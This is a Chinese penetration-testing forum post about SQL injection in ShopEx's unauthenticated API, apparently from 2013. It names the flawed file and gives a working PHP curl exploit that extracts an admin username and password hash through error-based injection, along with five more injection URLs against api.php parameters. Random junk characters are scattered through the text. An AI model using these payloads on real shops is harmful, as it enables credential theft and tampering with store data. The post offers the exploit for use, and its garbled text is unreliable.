中国网络渗透测试联盟

标题: shopEx最新版的API注入漏洞分析附利用exp [打印本页]

作者: admin    时间: 2013-7-27 18:34
标题: shopEx最新版的API注入漏洞分析附利用exp
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
3 O1 C: j  \+ t( s5 [core\api\payment\1.0\api_b2b_2_0_payment_cfg.php+ C' t1 q% V3 }; N* v' w6 V

1 o$ u+ ?3 k. M7 v+ b7 c第44行 $data['columns'] 未做过滤导致注入
, T' m6 C: A: K# E$ _+ ?6 R& J0 \8 a% ~" a2 _5 O/ r
<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.
( z6 S( B& G7 k8 f# F
0 d2 _; W! q3 t9 @注射1:
* i6 W8 v1 M/ d  q4 H. B5 [7 v$ p/ o3 d& M" f% z& T# k6 f  M
http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#% I8 Y# e3 z0 I9 O3 u
: J) l3 P6 }* p) r7 U% D8 r: X
注射2:0 G  E4 F- Q+ O* F7 Q
http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}
9 o% U, g1 i( Y7 r" W) s$ n
$ i$ z+ ~) @7 F8 x+ w& c注射3:
: Q8 ^; n+ Q5 v/ g* |  http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx* v, H% K. H* [1 p# u
注射4:9 ^0 h3 C5 q& R( A: ?- e

8 @9 }; g; P8 d7 m0 Rhttp://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1; S. a# c8 @, y1 M+ l1 X4 O; I% e6 a

7 }7 Q9 W% G: U! P; j5 a
8 O; w6 X6 _4 F0 `9 q注射5:
* A9 b! e) d* d( d  http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx
7 I- a) C% _! V1 Z9 s  s- s5 G' [# i

: R$ ]. N5 j$ N* @9 `. j: @; l! w( B) q9 x; _
7 u/ M: T0 Z1 U
/ W- I6 R0 l/ `% }
, ~7 ?" t* E( }' O$ j/ Z, H# Z) U7 |" y





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2